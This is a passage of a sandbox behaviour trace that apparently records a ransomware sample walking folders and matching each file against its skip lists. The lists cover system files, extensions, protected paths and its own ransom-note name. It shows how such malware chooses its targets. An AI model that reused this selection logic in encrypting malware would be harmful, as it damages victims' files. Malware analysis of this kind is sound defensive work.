(lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".rtf") returned 0x0 [0071.068] FileTimeToSystemTime (in: lpFileTime=0x552f6fc, lpSystemTime=0x552f6e8 | out: lpSystemTime=0x552f6e8) returned 1 [0071.068] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f6e8, lpLocalTime=0x552f6b8 | out: lpLocalTime=0x552f6b8) returned 1 [0071.068] FileTimeToSystemTime (in: lpFileTime=0x552f704, lpSystemTime=0x552f6c8 | out: lpSystemTime=0x552f6c8) returned 1 [0071.068] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f6c8, lpLocalTime=0x552f6d8 | out: lpLocalTime=0x552f6d8) returned 1 [0071.068] FileTimeToSystemTime (in: lpFileTime=0x552f70c, lpSystemTime=0x552f690 | out: lpSystemTime=0x552f690) returned 1 [0071.068] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f690, lpLocalTime=0x552f680 | out: lpLocalTime=0x552f680) returned 1 [0071.068] FindNextFileW (in: hFindFile=0xec2270, lpFindFileData=0x552f6f8 | out: lpFindFileData=0x552f6f8*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5398dc00, ftCreationTime.dwHighDateTime=0x1cac6fe, ftLastAccessTime.dwLowDateTime=0x5398dc00, ftLastAccessTime.dwHighDateTime=0x1cac6fe, ftLastWriteTime.dwLowDateTime=0x5398dc00, ftLastWriteTime.dwHighDateTime=0x1cac6fe, nFileSizeHigh=0x0, nFileSizeLow=0x13c4a, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="LocalizedData.xml", cAlternateFileName="LOCALI~1.XML")) returned 1 [0071.068] StrCmpW (psz1="LocalizedData.xml", psz2=".") returned 1 [0071.068] StrCmpW (psz1="LocalizedData.xml", psz2="..") returned 1 [0071.068] StrCpyNW (in: psz1=0xec8320, psz2="C:\\588bce7c90097ed212\\1029", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1029") returned="C:\\588bce7c90097ed212\\1029" [0071.069] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1029", psz2="\\", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1029\\") returned="C:\\588bce7c90097ed212\\1029\\" [0071.069] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1029\\", psz2="LocalizedData.xml", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1029\\LocalizedData.xml") returned="C:\\588bce7c90097ed212\\1029\\LocalizedData.xml" [0071.069] PathFindExtensionW (pszPath="LocalizedData.xml") returned=".xml" [0071.069] StrCmpW (psz1=".xml", psz2=".txd0t") returned 1 [0071.069] StrCmpIW (psz1="LocalizedData.xml", psz2="bootsect.bak") returned 1 [0071.069] StrCmpIW (psz1="LocalizedData.xml", psz2="iconcache.db") returned 1 [0071.069] StrCmpIW (psz1="LocalizedData.xml", psz2="thumbs.db") returned -1 [0071.069] StrCmpIW (psz1="LocalizedData.xml", psz2=" ransomware ") returned 1 [0071.069] StrCmpIW (psz1="LocalizedData.xml", psz2=" ransom ") returned 1 [0071.069] StrCmpIW (psz1="LocalizedData.xml", psz2="debug.txt") returned 1 [0071.069] StrCmpIW (psz1="LocalizedData.xml", psz2="boot.ini") returned 1 [0071.069] StrCmpIW (psz1="LocalizedData.xml", psz2="desktop.ini") returned 1 [0071.069] StrCmpIW (psz1="LocalizedData.xml", psz2="autorun.inf") returned 1 [0071.069] StrCmpIW (psz1="LocalizedData.xml", psz2="ntuser.dat") returned -1 [0071.069] StrCmpIW (psz1="LocalizedData.xml", psz2="ntldr") returned -1 [0071.069] StrCmpIW (psz1="LocalizedData.xml", psz2="ntdetect.com") returned -1 [0071.069] StrCmpIW (psz1="LocalizedData.xml", psz2="bootfont.bin") returned 1 [0071.069] StrCmpIW (psz1="LocalizedData.xml", psz2="!TXDOT_READ_ME!.txt") returned 1 [0071.069] PathFindExtensionW (pszPath="LocalizedData.xml") returned=".xml" [0071.069] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".xml") returned 0x0 [0071.069] FileTimeToSystemTime (in: lpFileTime=0x552f6fc, lpSystemTime=0x552f6e8 | out: lpSystemTime=0x552f6e8) returned 1 [0071.069] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f6e8, lpLocalTime=0x552f6b8 | out: lpLocalTime=0x552f6b8) returned 1 [0071.069] FileTimeToSystemTime (in: lpFileTime=0x552f704, lpSystemTime=0x552f6c8 | out: lpSystemTime=0x552f6c8) returned 1 [0071.069] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f6c8, lpLocalTime=0x552f6d8 | out: lpLocalTime=0x552f6d8) returned 1 [0071.069] FileTimeToSystemTime (in: lpFileTime=0x552f70c, lpSystemTime=0x552f690 | out: lpSystemTime=0x552f690) returned 1 [0071.069] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f690, lpLocalTime=0x552f680 | out: lpLocalTime=0x552f680) returned 1 [0071.069] FindNextFileW (in: hFindFile=0xec2270, lpFindFileData=0x552f6f8 | out: lpFindFileData=0x552f6f8*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4758, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 1 [0071.069] StrCmpW (psz1="SetupResources.dll", psz2=".") returned 1 [0071.069] StrCmpW (psz1="SetupResources.dll", psz2="..") returned 1 [0071.069] StrCpyNW (in: psz1=0xec8320, psz2="C:\\588bce7c90097ed212\\1029", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1029") returned="C:\\588bce7c90097ed212\\1029" [0071.069] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1029", psz2="\\", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1029\\") returned="C:\\588bce7c90097ed212\\1029\\" [0071.069] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1029\\", psz2="SetupResources.dll", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1029\\SetupResources.dll") returned="C:\\588bce7c90097ed212\\1029\\SetupResources.dll" [0071.069] PathFindExtensionW (pszPath="SetupResources.dll") returned=".dll" [0071.070] StrCmpW (psz1=".dll", psz2=".txd0t") returned -1 [0071.070] StrCmpIW (psz1="SetupResources.dll", psz2="bootsect.bak") returned 1 [0071.070] StrCmpIW (psz1="SetupResources.dll", psz2="iconcache.db") returned 1 [0071.070] StrCmpIW (psz1="SetupResources.dll", psz2="thumbs.db") returned -1 [0071.070] StrCmpIW (psz1="SetupResources.dll", psz2=" ransomware ") returned 1 [0071.070] StrCmpIW (psz1="SetupResources.dll", psz2=" ransom ") returned 1 [0071.070] StrCmpIW (psz1="SetupResources.dll", psz2="debug.txt") returned 1 [0071.070] StrCmpIW (psz1="SetupResources.dll", psz2="boot.ini") returned 1 [0071.070] StrCmpIW (psz1="SetupResources.dll", psz2="desktop.ini") returned 1 [0071.070] StrCmpIW (psz1="SetupResources.dll", psz2="autorun.inf") returned 1 [0071.070] StrCmpIW (psz1="SetupResources.dll", psz2="ntuser.dat") returned 1 [0071.070] StrCmpIW (psz1="SetupResources.dll", psz2="ntldr") returned 1 [0071.070] StrCmpIW (psz1="SetupResources.dll", psz2="ntdetect.com") returned 1 [0071.070] StrCmpIW (psz1="SetupResources.dll", psz2="bootfont.bin") returned 1 [0071.070] StrCmpIW (psz1="SetupResources.dll", psz2="!TXDOT_READ_ME!.txt") returned 1 [0071.070] PathFindExtensionW (pszPath="SetupResources.dll") returned=".dll" [0071.070] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".dll") returned=".dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui" [0071.070] FindNextFileW (in: hFindFile=0xec2270, lpFindFileData=0x552f6f8 | out: lpFindFileData=0x552f6f8*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4758, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 0 [0071.070] FindClose (in: hFindFile=0xec2270 | out: hFindFile=0xec2270) returned 1 [0071.073] GetProcessHeap () returned 0xe30000 [0071.073] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xec8320 | out: hHeap=0xe30000) returned 1 [0071.073] FindNextFileW (in: hFindFile=0xec23f0, lpFindFileData=0x552f9a8 | out: lpFindFileData=0x552f9a8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf371c69a, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf378ed8a, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf37db23a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="1030", cAlternateFileName="")) returned 1 [0071.073] StrCmpW (psz1="1030", psz2=".") returned 1 [0071.073] StrCmpW (psz1="1030", psz2="..") returned 1 [0071.073] StrCpyNW (in: psz1=0xec6e60, psz2="C:\\588bce7c90097ed212", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212") returned="C:\\588bce7c90097ed212" [0071.073] StrNCatW (in: psz1="C:\\588bce7c90097ed212", psz2="\\", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212\\") returned="C:\\588bce7c90097ed212\\" [0071.073] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\", psz2="1030", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212\\1030") returned="C:\\588bce7c90097ed212\\1030" [0071.073] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1030", lpSrch="\\windows\\system32\\") returned 0x0 [0071.074] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1030", lpSrch="\\windows\\syswow64\\") returned 0x0 [0071.074] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1030", lpSrch="\\windows\\system\\") returned 0x0 [0071.074] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1030", lpSrch="\\windows\\winsxs\\") returned 0x0 [0071.074] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1030", lpSrch="\\appdata\\roaming\\") returned 0x0 [0071.074] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1030", lpSrch="\\appdata\\local\\") returned 0x0 [0071.074] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1030", lpSrch="\\appdata\\locallow\\") returned 0x0 [0071.074] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1030", lpSrch="\\all users\\microsoft\\") returned 0x0 [0071.074] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1030", lpSrch="\\inetpub\\logs\\") returned 0x0 [0071.074] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1030", lpSrch=":\\boot\\") returned 0x0 [0071.074] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1030", lpSrch=":\\perflogs\\") returned 0x0 [0071.074] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1030", lpSrch=":\\programdata\\") returned 0x0 [0071.074] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1030", lpSrch=":\\drivers\\") returned 0x0 [0071.074] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1030", lpSrch=":\\wsus\\") returned 0x0 [0071.074] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1030", lpSrch=":\\efstmpwp\\") returned 0x0 [0071.074] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1030", lpSrch=":\\$recycle.bin\\") returned 0x0 [0071.074] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1030", lpSrch="crypt_detect") returned 0x0 [0071.074] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1030", lpSrch="cryptolocker") returned 0x0 [0071.074] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1030", lpSrch="ransomware") returned 0x0 [0071.074] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1030", lpSrch="C:\\WINDOWS") returned 0x0 [0071.074] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1030", lpSrch="C:\\Program Files (x86)") returned 0x0 [0071.074] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1030", lpSrch="C:\\Program Files") returned 0x0 [0071.074] GetProcessHeap () returned 0xe30000 [0071.074] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x4b6) returned 0xec8320 [0071.074] StrCpyNW (in: psz1=0xec8320, psz2="C:\\588bce7c90097ed212\\1030", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1030") returned="C:\\588bce7c90097ed212\\1030" [0071.074] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1030", psz2="\\*", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1030\\*") returned="C:\\588bce7c90097ed212\\1030\\*" [0071.074] FindFirstFileW (in: lpFileName="C:\\588bce7c90097ed212\\1030\\*", lpFindFileData=0x552f6f8 | out: lpFindFileData=0x552f6f8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf371c69a, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf378ed8a, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf37db23a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xec23b0 [0071.075] StrCmpW (psz1=".", psz2=".") returned 0 [0071.075] FindNextFileW (in: hFindFile=0xec23b0, lpFindFileData=0x552f6f8 | out: lpFindFileData=0x552f6f8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf371c69a, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf378ed8a, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf37db23a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0071.075] StrCmpW (psz1="..", psz2=".") returned 1 [0071.075] StrCmpW (psz1="..", psz2="..") returned 0 [0071.075] FindNextFileW (in: hFindFile=0xec23b0, lpFindFileData=0x552f6f8 | out: lpFindFileData=0x552f6f8*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x69d9e300, ftCreationTime.dwHighDateTime=0x1cac0d3, ftLastAccessTime.dwLowDateTime=0x69d9e300, ftLastAccessTime.dwHighDateTime=0x1cac0d3, ftLastWriteTime.dwLowDateTime=0x69d9e300, ftLastWriteTime.dwHighDateTime=0x1cac0d3, nFileSizeHigh=0x0, nFileSizeLow=0xcf2, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="eula.rtf", cAlternateFileName="")) returned 1 [0071.075] StrCmpW (psz1="eula.rtf", psz2=".") returned 1 [0071.075] StrCmpW (psz1="eula.rtf", psz2="..") returned 1 [0071.075] StrCpyNW (in: psz1=0xec8320, psz2="C:\\588bce7c90097ed212\\1030", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1030") returned="C:\\588bce7c90097ed212\\1030" [0071.075] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1030", psz2="\\", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1030\\") returned="C:\\588bce7c90097ed212\\1030\\" [0071.075] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1030\\", psz2="eula.rtf", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1030\\eula.rtf") returned="C:\\588bce7c90097ed212\\1030\\eula.rtf" [0071.076] PathFindExtensionW (pszPath="eula.rtf") returned=".rtf" [0071.076] StrCmpW (psz1=".rtf", psz2=".txd0t") returned -1 [0071.076] StrCmpIW (psz1="eula.rtf", psz2="bootsect.bak") returned 1 [0071.076] StrCmpIW (psz1="eula.rtf", psz2="iconcache.db") returned -1 [0071.076] StrCmpIW (psz1="eula.rtf", psz2="thumbs.db") returned -1 [0071.076] StrCmpIW (psz1="eula.rtf", psz2=" ransomware ") returned 1 [0071.076] StrCmpIW (psz1="eula.rtf", psz2=" ransom ") returned 1 [0071.076] StrCmpIW (psz1="eula.rtf", psz2="debug.txt") returned 1 [0071.076] StrCmpIW (psz1="eula.rtf", psz2="boot.ini") returned 1 [0071.076] StrCmpIW (psz1="eula.rtf", psz2="desktop.ini") returned 1 [0071.076] StrCmpIW (psz1="eula.rtf", psz2="autorun.inf") returned 1 [0071.076] StrCmpIW (psz1="eula.rtf", psz2="ntuser.dat") returned -1 [0071.076] StrCmpIW (psz1="eula.rtf", psz2="ntldr") returned -1 [0071.076] StrCmpIW (psz1="eula.rtf", psz2="ntdetect.com") returned -1 [0071.076] StrCmpIW (psz1="eula.rtf", psz2="bootfont.bin") returned 1 [0071.076] StrCmpIW (psz1="eula.rtf", psz2="!TXDOT_READ_ME!.txt") returned 1 [0071.076] PathFindExtensionW (pszPath="eula.rtf") returned=".rtf" [0071.076] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".rtf") returned 0x0 [0071.076] FileTimeToSystemTime (in: lpFileTime=0x552f6fc, lpSystemTime=0x552f6e8 | out: lpSystemTime=0x552f6e8) returned 1 [0071.076] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f6e8, lpLocalTime=0x552f6b8 | out: lpLocalTime=0x552f6b8) returned 1 [0071.076] FileTimeToSystemTime (in: lpFileTime=0x552f704, lpSystemTime=0x552f6c8 | out: lpSystemTime=0x552f6c8) returned 1 [0071.076] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f6c8, lpLocalTime=0x552f6d8 | out: lpLocalTime=0x552f6d8) returned 1 [0071.076] FileTimeToSystemTime (in: lpFileTime=0x552f70c, lpSystemTime=0x552f690 | out: lpSystemTime=0x552f690) returned 1 [0071.076] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f690, lpLocalTime=0x552f680 | out: lpLocalTime=0x552f680) returned 1 [0071.076] FindNextFileW (in: hFindFile=0xec23b0, lpFindFileData=0x552f6f8 | out: lpFindFileData=0x552f6f8*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5398dc00, ftCreationTime.dwHighDateTime=0x1cac6fe, ftLastAccessTime.dwLowDateTime=0x5398dc00, ftLastAccessTime.dwHighDateTime=0x1cac6fe, ftLastWriteTime.dwLowDateTime=0x5398dc00, ftLastWriteTime.dwHighDateTime=0x1cac6fe, nFileSizeHigh=0x0, nFileSizeLow=0x12fb4, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="LocalizedData.xml", cAlternateFileName="LOCALI~1.XML")) returned 1 [0071.076] StrCmpW (psz1="LocalizedData.xml", psz2=".") returned 1 [0071.076] StrCmpW (psz1="LocalizedData.xml", psz2="..") returned 1 [0071.076] StrCpyNW (in: psz1=0xec8320, psz2="C:\\588bce7c90097ed212\\1030", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1030") returned="C:\\588bce7c90097ed212\\1030" [0071.076] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1030", psz2="\\", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1030\\") returned="C:\\588bce7c90097ed212\\1030\\" [0071.076] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1030\\", psz2="LocalizedData.xml", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1030\\LocalizedData.xml") returned="C:\\588bce7c90097ed212\\1030\\LocalizedData.xml" [0071.077] PathFindExtensionW (pszPath="LocalizedData.xml") returned=".xml" [0071.077] StrCmpW (psz1=".xml", psz2=".txd0t") returned 1 [0071.077] StrCmpIW (psz1="LocalizedData.xml", psz2="bootsect.bak") returned 1 [0071.077] StrCmpIW (psz1="LocalizedData.xml", psz2="iconcache.db") returned 1 [0071.077] StrCmpIW (psz1="LocalizedData.xml", psz2="thumbs.db") returned -1 [0071.077] StrCmpIW (psz1="LocalizedData.xml", psz2=" ransomware ") returned 1 [0071.077] StrCmpIW (psz1="LocalizedData.xml", psz2=" ransom ") returned 1 [0071.077] StrCmpIW (psz1="LocalizedData.xml", psz2="debug.txt") returned 1 [0071.077] StrCmpIW (psz1="LocalizedData.xml", psz2="boot.ini") returned 1 [0071.077] StrCmpIW (psz1="LocalizedData.xml", psz2="desktop.ini") returned 1 [0071.077] StrCmpIW (psz1="LocalizedData.xml", psz2="autorun.inf") returned 1 [0071.077] StrCmpIW (psz1="LocalizedData.xml", psz2="ntuser.dat") returned -1 [0071.077] StrCmpIW (psz1="LocalizedData.xml", psz2="ntldr") returned -1 [0071.077] StrCmpIW (psz1="LocalizedData.xml", psz2="ntdetect.com") returned -1 [0071.077] StrCmpIW (psz1="LocalizedData.xml", psz2="bootfont.bin") returned 1 [0071.077] StrCmpIW (psz1="LocalizedData.xml", psz2="!TXDOT_READ_ME!.txt") returned 1 [0071.077] PathFindExtensionW (pszPath="LocalizedData.xml") returned=".xml" [0071.077] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".xml") returned 0x0 [0071.077] FileTimeToSystemTime (in: lpFileTime=0x552f6fc, lpSystemTime=0x552f6e8 | out: lpSystemTime=0x552f6e8) returned 1 [0071.077] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f6e8, lpLocalTime=0x552f6b8 | out: lpLocalTime=0x552f6b8) returned 1 [0071.077] FileTimeToSystemTime (in: lpFileTime=0x552f704, lpSystemTime=0x552f6c8 | out: lpSystemTime=0x552f6c8) returned 1 [0071.077] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f6c8, lpLocalTime=0x552f6d8 | out: lpLocalTime=0x552f6d8) returned 1 [0071.077] FileTimeToSystemTime (in: lpFileTime=0x552f70c, lpSystemTime=0x552f690 | out: lpSystemTime=0x552f690) returned 1 [0071.077] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f690, lpLocalTime=0x552f680 | out: lpLocalTime=0x552f680) returned 1 [0071.077] FindNextFileW (in: hFindFile=0xec23b0, lpFindFileData=0x552f6f8 | out: lpFindFileData=0x552f6f8*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4758, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 1 [0071.077] StrCmpW (psz1="SetupResources.dll", psz2=".") returned 1 [0071.077] StrCmpW (psz1="SetupResources.dll", psz2="..") returned 1 [0071.077] StrCpyNW (in: psz1=0xec8320, psz2="C:\\588bce7c90097ed212\\1030", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1030") returned="C:\\588bce7c90097ed212\\1030" [0071.077] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1030", psz2="\\", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1030\\") returned="C:\\588bce7c90097ed212\\1030\\" [0071.078] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1030\\", psz2="SetupResources.dll", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1030\\SetupResources.dll") returned="C:\\588bce7c90097ed212\\1030\\SetupResources.dll" [0071.078] PathFindExtensionW (pszPath="SetupResources.dll") returned=".dll" [0071.078] StrCmpW (psz1=".dll", psz2=".txd0t") returned -1 [0071.078] StrCmpIW (psz1="SetupResources.dll", psz2="bootsect.bak") returned 1 [0071.078] StrCmpIW (psz1="SetupResources.dll", psz2="iconcache.db") returned 1 [0071.078] StrCmpIW (psz1="SetupResources.dll", psz2="thumbs.db") returned -1 [0071.078] StrCmpIW (psz1="SetupResources.dll", psz2=" ransomware ") returned 1 [0071.078] StrCmpIW (psz1="SetupResources.dll", psz2=" ransom ") returned 1 [0071.078] StrCmpIW (psz1="SetupResources.dll", psz2="debug.txt") returned 1 [0071.078] StrCmpIW (psz1="SetupResources.dll", psz2="boot.ini") returned 1 [0071.078] StrCmpIW (psz1="SetupResources.dll", psz2="desktop.ini") returned 1 [0071.078] StrCmpIW (psz1="SetupResources.dll", psz2="autorun.inf") returned 1 [0071.078] StrCmpIW (psz1="SetupResources.dll", psz2="ntuser.dat") returned 1 [0071.078] StrCmpIW (psz1="SetupResources.dll", psz2="ntldr") returned 1 [0071.078] StrCmpIW (psz1="SetupResources.dll", psz2="ntdetect.com") returned 1 [0071.078] StrCmpIW (psz1="SetupResources.dll", psz2="bootfont.bin") returned 1 [0071.078] StrCmpIW (psz1="SetupResources.dll", psz2="!TXDOT_READ_ME!.txt") returned 1 [0071.078] PathFindExtensionW (pszPath="SetupResources.dll") returned=".dll" [0071.078] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".dll") returned=".dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui" [0071.078] FindNextFileW (in: hFindFile=0xec23b0, lpFindFileData=0x552f6f8 | out: lpFindFileData=0x552f6f8*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4758, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 0 [0071.078] FindClose (in: hFindFile=0xec23b0 | out: hFindFile=0xec23b0) returned 1 [0071.078] GetProcessHeap () returned 0xe30000 [0071.078] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xec8320 | out: hHeap=0xe30000) returned 1 [0071.078] FindNextFileW (in: hFindFile=0xec23f0, lpFindFileData=0x552f9a8 | out: lpFindFileData=0x552f9a8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf37428cd, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf378ed8a, ftLastAccessTime.dwHighDateTime=0x1d327bd, 